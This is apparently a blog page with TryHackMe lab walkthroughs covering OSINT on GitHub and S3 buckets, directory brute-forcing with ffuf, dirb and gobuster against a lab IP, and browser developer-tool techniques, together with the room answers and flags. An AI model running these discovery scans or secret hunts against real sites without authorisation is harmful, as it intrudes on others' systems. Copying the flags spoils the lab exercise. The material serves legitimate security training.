    To understand GitHub, you first need to understand Git. Git is a version control system that tracks changes to files in a project. Working in a team is easier because you can see what each team member is editing and what changes they made to files. When users have finished making their changes, they commit them with a message and then push them back to a central location (repository) for the other users to then pull those changes to their local machines. GitHub is a hosted version of Git on the internet. Repositories can either be set to public or private and have various access controls. You can use GitHub's search feature to look for company names or website names to try and locate repositories belonging to your target. Once discovered, you may have access to source code, passwords or other content that you hadn't yet found.



    1) What is Git?

    Ans- Version Control System



    OSINT - S3 Buckets


    S3 Buckets

    S3 Buckets are a storage service provided by Amazon AWS, allowing people to save files and even static website content in the cloud accessible over HTTP and HTTPS. The owner of the files can set access permissions to either make files public, private and even writable. Sometimes these access permissions are incorrectly set and inadvertently allow access to files that shouldn't be available to the public. The format of the S3 buckets is http(s)://{name}.s3.amazonaws.com where {name} is decided by the owner, such as tryhackme-assets.s3.amazonaws.com. S3 buckets can be discovered in many ways, such as finding the URLs in the website's page source, GitHub repositories, or even automating the process. One common automation method is by using the company name followed by common terms such as {name}-assets, {name}-www, {name}-public, {name}-private, etc.



    1) What URL format do Amazon S3 buckets end in?

    Ans- .s3.amazonaws.com




    Automated Discovery


    What is Automated Discovery?


    Automated discovery is the process of using tools to discover content rather than doing it manually. This process is automated as it usually contains hundreds, thousands or even millions of requests to a web server. These requests check whether a file or directory exists on a website, giving us access to resources we didn't previously know existed. This process is made possible by using a resource called wordlists.





    What are wordlists?


    Wordlists are just text files that contain a long list of commonly used words; they can cover many different use cases. For example, a password wordlist would include the most frequently used passwords, whereas we're looking for content in our case, so we'd require a list containing the most commonly used directory and file names. An excellent resource for wordlists that is preinstalled on the THM AttackBox is https://github.com/danielmiessler/SecLists which Daniel Miessler curates.




    Automation Tools


    Although there are many different content discovery tools available, all with their features and flaws, we're going to cover three which are preinstalled on our attack box, ffuf, dirb and gobuster.


    Open the THM AttackBox using the blue Start AttackBox button and then try the below three commands on our Acme IT Support website and see what results you get.

     

    Using ffuf:
    
    ffuf
    
            
    user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.159.199/FUZZ
    
            
    
    
    
    Using dirb:
    
    dirb
    
               
    user@machine$ dirb http://10.10.159.199/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    
            
    
    
    
    Using Gobuster:
    
    gobuster
    
               
    user@machine$ gobuster dir --url http://10.10.159.199/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    
            
    
    
    
    

     


    1) What is the name of the directory beginning "/mo...." that was discovered?

    Ans- /monthly



    2) What is the name of the log file that was discovered?

    Ans- /development.log

     

     


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal

     


  • TryHackMe Walking An Application Walkthrough

     

    TryHackMe Walking An Application Walkthrough



    Walking An Application


    In this room you will learn how to manually review a web application for security issues using only the in-built tools in your browser. More often than not, automated security tools and scripts will miss many potential vulnerabilities and useful information.



    Here is a short breakdown of the in-built browser tools you will use throughout this room:


    View Source
    - Use your browser to view the human-readable source code of a website.
    Inspector - Learn how to inspect page elements and make changes to view usually blocked content.
    Debugger - Inspect and control the flow of a page's JavaScript
    Network - See all the network requests a page makes.

     

     

    TryHackMe Walking An Application Walkthrough

     



    Exploring The Website


    As a penetration tester, your role when reviewing a website or web application is to discover features that could potentially be vulnerable and attempt to exploit them to assess whether or not they are. These features are usually parts of the website that require some interactivity with the user.

    Finding interactive portions of the website can be as easy as spotting a login form to manually reviewing the website's JavaScript. An excellent place to start is just with your browser exploring the website and noting down the individual pages/areas/features with a summary for each one.


    An example site review for the Acme IT Support website would look something like this:

     

     

    Feature URL Summary
    Home Page / This page contains a summary of what Acme IT Support does with a company photo of their staff.
    Latest News /news This page contains a list of recently published news articles by the company, and each news article has a link with an id number, i.e. /news/article?id=1
    News Article /news/article?id=1 Displays the individual news article. Some articles seem to be blocked and reserved for premium customers only.
    Contat Page /contact This page contains a form for customers to contact the company. It contains name, email and message input fields and a send button.
    Customers Login /customers/login This page contains a login form with username and password fields.
    Customer Signup /customers/signup This page contains a user-signup form that consists of a username, email, password and password confirmation input fields.
    Customer Reset Password /customers/reset Password reset form with an email address input field.
    Customer Dashboard /customers This page contains a list of the user's tickets submitted to the IT support company and a "Create Ticket" button.
    Create Ticket /customers/ticket/new This page contains a form with a textbox for entering the IT issue and a file upload option to create an IT support ticket.
    Customer Account /customers/account This page allows the user to edit their username, email and password.
    Customer Logout /customers/logout This link logs the user out of the customer area.

     

     


    Viewing The Page Source



    The page source is the human-readable code returned to our browser/client from the web server each time we make a request.


    The returned code is made up of HTML ( HyperText Markup Language), CSS ( Cascading Style Sheets ) and JavaScript, and it's what tells our browser what content to display, how to show it and adds an element of interactivity with JavaScript.


    For our purposes, viewing the page source can help us discover more information about the web application.


    How do I view the Page Source?


    While viewing a website, you can right-click on the page, and you'll see an option on the menu that says View Page Source.
    Most browsers support putting view-source: in front of the URL for example, view-source:https://www.google.com/
    In your browser menu, you'll find an option to view the page source. This option can sometimes be in submenus such as developer tools or more tools.



    Let's view some Page Source!


    Try viewing the page source of the home page of the Acme IT Support website. Unfortunately, explaining everything you can see here is well out of the scope of this room, and you'll need to look into website design/development courses to understand it fully. What we can do, is pick out bits of information that are of importance to us.

     

     

    At the top of the page, you'll notice some code starting with <!-- and ending with --> these are comments. Comments are messages left by the website developer, usually to explain something in the code to other programmers or even notes/reminders for themselves. These comments don't get displayed on the actual webpage. This comment describes how the homepage is temporary while a new one is in development. View the webpage in the comment to get your first flag.


    Links to different pages in HTML are written in anchor tags ( these are HTML elements that start with <a ), and the link that you'll be directed to is stored in the href attribute.


    For example, you'll see the contact page link on line 31:

     

     


    TryHackMe Walking An Application Walkthrough

     

     If you view further down the page source, there is a hidden link to a page starting with "secr", view this link to get another flag. You obviously wouldn't get a flag in a real-world situation, but you may discover some private area used by the business for storing company/staff/customer information.


    External files such as CSS, JavaScript and Images can be included using the HTML code. In this example, you'll notice that these files are all stored in the same directory. If you view this directory in your web browser, there is a configuration error. What should be displayed is either a blank page or a 403 Forbidden page with an error stating you don't have access to the directory. Instead, the directory listing feature has been enabled, which in fact, lists every file in the directory. Sometimes this isn't an issue, and all the files in the directory are safe to be viewed by the public, but in some instances, backup files, source code or other confidential information could be stored here. In this instance, we get a flag in the flag.txt file.


    Many websites these days aren't made from scratch and use what's called a framework. A framework is a collection of premade code that easily allows a developer to include common features that a website would require, such as blogs, user management, form processing, and much more, saving the developers hours or days of development.


    Viewing the page source can often give us clues into whether a framework is in use and, if so, which framework and even what version. Knowing the framework and version can be a powerful find as there may be public vulnerabilities in the framework, and the website might not be using the most up to date version. At the bottom of the page, you'll find a comment about the framework and version in use and a link to the framework's website. Viewing the framework's website, you'll see that our website is, in fact, out of date. Read the update notice and use the information that you find to discover another flag.


     


    1) What is the flag from the HTML comment?

    HINT- Make sure you go to the link mentioned in the comment

     

    TryHackMe Walking An Application Walkthrough


    TryHackMe Walking An Application Walkthrough




    Ans- THM{HTML_COMMENTS_ARE_DANGEROUS}

     

    2) What is the flag from the secret link?

    HINT- For example, you'll see the contact page link on line 31: 



    TryHackMe Walking An Application Walkthrough



    TryHackMe Walking An Application Walkthrough




    Ans- THM{NOT_A_SECRET_ANYMORE}
     



    3) What is the directory listing flag?



    TryHackMe Walking An Application Walkthrough


    TryHackMe Walking An Application Walkthrough

     


    Ans- THM{INVALID_DIRECTORY_PERMISSIONS}

     


    4) What is the framework flag?


    TryHackMe Walking An Application Walkthrough


    TryHackMe Walking An Application Walkthrough


    TryHackMe Walking An Application Walkthrough

     

    Ans- THM{KEEP_YOUR_SOFTWARE_UPDATED}

     

     

    Developer Tools - Inspector


    Developer Tools

    Every modern browser includes developer tools; this is a tool kit used to aid web developers in debugging web applications and gives you a peek under the hood of a website to see what is going on. As a pentester, we can leverage these tools to provide us with a much better understanding of the web application. We're specifically focusing on three features of the developer tool kit, Inspector, Debugger and Network.



    Opening Developer Tools


    The way to access developer tools is different for every browser. If you're not sure how to access it, click the "View Site" button on the top right of this task to get instructions to how to access the tools for your browser.




    Inspector


    The page source doesn't always represent what's shown on a webpage; this is because CSS, JavaScript and user interaction can change the content and style of the page, which means we need a way to view what's been displayed in the browser window at this exact time. Element inspector assists us with this by providing us with a live representation of what is currently on the website.


    As well as viewing this live view, we can also edit and interact with the page elements, which is helpful for web developers to debug issues.

    On the Acme IT Support website, click into the news section, where you'll see three news articles.


    The first two articles are readable, but the third has been blocked with a floating notice above the content stating you have to be a premium customer to view the article. These floating boxes blocking the page contents are often referred to as paywalls as they put up a metaphorical wall in front of the content you wish to see until you pay.



     

    TryHackMe Walking An Application Walkthrough

     

    Right-clicking on the premium notice ( paywall ), you should be able to select the Inspect option from the menu, which opens the developer tools either on the bottom or right-hand side depending on your browser or preferences. You'll now see the elements/HTML that make up the website ( similar to the screenshots below ).

     

    TryHackMe Walking An Application Walkthrough

     

    Locate the DIV element with the class premium-customer-blocker and click on it. You'll see all the CSS styles in the styles box that apply to this element, such as margin-top: 60px and text-align: center. The style we're interested in is the display: block. If you click on the word block, you can type a value of your own choice. Try typing none, and this will make the box disappear, revealing the content underneath it and a flag. If the element didn't have a display field, you could click below the last style and add in your own. Have a play with the element inspector, and you'll see you can change any of the information on the website, including the content. Remember this is only edited on your browser window, and when you press refresh, everything will be back to normal.

     




    1) What is the flag behind the paywall?

    HINT- https://assets.tryhackme.com/additional/walkinganapplication/updating-html-css.gif


    TryHackMe Walking An Application Walkthrough


    TryHackMe Walking An Application Walkthrough




    TryHackMe Walking An Application Walkthrough


     

    TryHackMe Walking An Application Walkthrough

     

     

    Ans- THM{NOT_SO_HIDDEN}

     

     


    Developer Tools - Debugger


    This panel in the developer tools is intended for debugging JavaScript, and again is an excellent feature for web developers wanting to work out why something might not be working. But as penetration testers, it gives us the option of digging deep into the JavaScript code. In Firefox and Safari, this feature is called Debugger, but in Google Chrome, it's called Sources.


    On the Acme IT Support website, click on the contact page, each time the page is loaded, you might notice a rapid flash of red on the screen. We're going to use the Debugger to work out what this red flash is and if it contains anything interesting. Debugging a red dot wouldn't be something you'd do in the real world as a penetration tester, but it does allow us to use this feature and get used to the Debugger.


    In both browsers, on the left-hand side, you see a list of all the resources the current webpage is using. If you click into the assets folder, you'll see a file named flash.min.js. Clicking on this file displays the contents of the JavaScript file.


    Many times when viewing javascript files, you'll notice that everything is on one line, which is because it has been minimised, which means all formatting ( tabs, spacing and newlines ) have been removed to make the file smaller. This file is no exception to this, and it has also been obfusticated, which makes it purposely difficult to read, so it can't be copied as easily by other developers.


    We can return some of the formattings by using the "Pretty Print" option, which looks like two braces { } to make it a little more readable, although due to the obfustication, it's still difficult to comprehend what is going on with the file. If you scroll to the bottom of the flash.min.js file, you'll see the line: 

    flash['remove'](); 

     

    This little bit of JavaScript is what is removing the red popup from the page. We can utilise another feature of debugger called breakpoints. These are points in the code that we can force the browser to stop processing the JavaScript and pause the current execution.


    If you click the line number that contains the above code, you'll notice it turns blue; you've now inserted a breakpoint on this line. Now try refreshing the page, and you'll notice the red box stays on the page instead of disappearing, and it contains a flag.
    Answer the questions below



    1) What is the flag in the red box?

    HINT- The debugger tools might work differently on FireFox/Chrome. Follow the steps in the task to find the JavaScript flash.min.js file, prettifying it, finding the line with "flash[remove]" and adding a JavaScript break point to stop the red message disappearing when the page loads.


    TryHackMe Walking An Application Walkthrough


    TryHackMe Walking An Application Walkthrough



    Ans- THM{CATCH_ME_IF_YOU_CAN}

     

     


    Developer Tools - Network


    The network tab on the developer tools can be used to keep track of every external request a webpage makes. If you click on the Network tab and then refresh the page, you'll see all the files the page is requesting.


    Try doing this on the contact page; you can press the trash can icon to delete the list if it gets a bit overpopulated.


    With the network tab open, try filling in the contact form and pressing the Send Message button. You'll notice an event in the network tab, and this is the form being submitted in the background using a method called AJAX. AJAX is a method for sending and receiving network data in a web application background without interfering by changing the current web page.



    TryHackMe Walking An Application Walkthrough




    Examine the new entry on the network tab that the contact form created and view the page the data was sent to in order to reveal a flag.

     

    1) What is the flag shown on the contact-msg network request?

    HINT- When you find the contact-msg request, make sure you click on it to reveal the response of the request (there might be a response tab shown when you click it). After filling this form click on refresh button and see the contact-msg and double on click it.


     

    TryHackMe Walking An Application Walkthrough


    TryHackMe Walking An Application Walkthrough

     



    Ans- THM{GOT_AJAX_FLAG}
     

     

     


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



     

  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.